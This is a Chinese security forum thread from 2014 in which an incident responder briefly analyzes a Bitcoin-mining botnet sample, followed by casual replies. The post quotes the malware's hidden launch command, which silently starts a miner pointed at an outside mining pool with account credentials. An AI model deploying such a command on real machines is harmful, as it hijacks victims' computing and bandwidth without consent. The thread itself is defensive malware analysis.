初探比特币Botnet

显示全部楼层 · 发表于 2014-10-31 14:53:19

本帖最后由 yunsini 于 2014-10-31 14:53 编辑

前些天,同事去客户那里进行应急响应时带回了一些样本.同事说可能比较有趣，让我看看一下有没有什么好玩的.

样本有32和64位两种，这是64位的截图

里面有个叫“bash”的快捷方式。具体指向的内容是：

C:\Windows\init\hstart.exe /NOCONSOLE /SILENT /D="%SystemRoot%\init\spoolv64" /HIGH "%SystemRoot%\init\spoolv64\init.exe -o stratum+tcp://monk.us.to:3333 -O geox.2:x"

简单分析发现hstart.exe是个正常的程序，它主要的作用是让窗口程序无窗口启动。
可以在http://www.ntwind.com/software/hstart.html 下载到它.
网站上有它的启动参数截图：

看其调用参数可以知道hstart使用无×界面、高优先级来启动init.exe

使用IDA简单分析init.exe，已经其启动参数可以推测出，它是用挖掘比特币的.
因为看参数调用，它和一个叫做minerd的比特币挖掘的软件用法差不多.
在http://doges.org/digging-coins/guide-on-mining-with-minerd-(cpu)/  有这个软件的介绍.

在现在的程序中：
monk.us.to    是挖矿服务器地址
3333  是端口
geox 是账号.
x 是密码.

取证带回的其他dll文件都是正常的库文件.

显示全部楼层 · 发表于 2014-10-31 16:35:57

发错地方了？都没人看，没人回复啊？？

[:340:]

显示全部楼层 · 发表于 2014-10-31 16:47:19

如果是盗取比特币的malware或者漏洞什么的，应该会火，各种扫描党，主防党，分析行为什么的。

显示全部楼层 · 发表于 2014-10-31 16:49:37

已经看过了。。。。。。。。。。。。。。。。。。

显示全部楼层 · 发表于 2014-10-31 16:50:41

本帖最后由 yunsini 于 2014-10-31 17:06 编辑

@panzhitian 恩，
这个是那别人机器挖掘比特币，阻塞了宽带、消耗机器性能....

说挖挖掘，那么问题来了。。

显示全部楼层 · 发表于 2014-10-31 17:05:10

yaoogle007 发表于 2014-10-31 16:49
已经看过了。。。。。。。。。。。。。。。。。。

苦逼的AV工程屎？

显示全部楼层 · 发表于 2014-10-31 17:11:26

账号密码呢？我裤子都脱了

显示全部楼层 · 发表于 2014-11-15 23:53:18

liangxy 发表于 2014-10-31 17:11
账号密码呢？我裤子都脱了

天冷了，还是穿上吧

显示全部楼层 · 发表于 2014-11-18 20:55:55

拿别人的机器给自己赚钱这也是醉了

[讨论] 初探比特币Botnet